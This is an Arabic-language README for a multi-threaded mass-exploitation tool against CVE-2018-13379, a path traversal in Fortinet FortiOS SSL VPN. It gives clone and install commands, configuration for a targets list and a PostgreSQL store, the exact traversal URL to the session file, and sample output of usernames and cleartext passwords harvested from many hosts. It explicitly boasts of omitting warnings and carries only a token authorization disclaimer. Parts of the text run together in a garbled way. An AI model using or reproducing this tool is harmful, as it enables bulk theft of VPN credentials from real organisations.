
CVE-2018-13379 أداة استغلال جماعية لـ Fortinet FortiOS SSL VPN. تستخرج بيانات الاعتماد فورًا، وتحفظها إلى CSV + PostgreSQL. متعددة الخيوط، بدون تحذيرات غير ضرورية.

أداة للاستغلال الجماعي لثغرة CVE-2018-13379 (عبور المسار) في Fortinet FortiOS SSL VPN. تسمح بقراءة ملفات الجلسات واستخراج أسماء المستخدمين وكلمات المرور بنص واضح.
/remote/fgt_langfortios_creds_20250120_143052)git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary
جميع الإعدادات قابلة للتعديل مباشرةً داخل السكريبت - لا داعي للعبث بوسائط سطر الأوامر:
TARGETS_FILE = "targets.txt" # ملف الأهداف (ip:port)
CSV_FILE = "fortios_creds.csv" # ملف CSV للإخراج
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8
targets.txt يحتوي على الأهداف، هدف واحد في كل سطر:192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
python3 exploit.py
fortios_creds_YYYYMMDD_HHMMSS)مثال على الإخراج:
[+] تم تحميل 100 هدف. نعمل بـ 20 خيطًا...
[+] تسريب: 192.168.1.1:8443
→ جلب 3 بيانات اعتماد
تمت كتابة 3 بيانات اعتماد إلى CSV
تم إدخال 3 بيانات اعتماد في قاعدة البيانات
[-] لا تسريب: 10.0.0.1:10443
https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websessionvar fgt_lang (علامة على وجود الثغرة)username و password من الرد الثنائيrequestspsycopg2-binary (اختياري - بدونها يعمل فقط مع ملفات CSV)urllib3هذه الأداة مخصصة للأغراض التعليمية والاختبار المُصرَّح به. أنت مسؤول عن أفعالك.
Unlicense - افعل ما تشاء.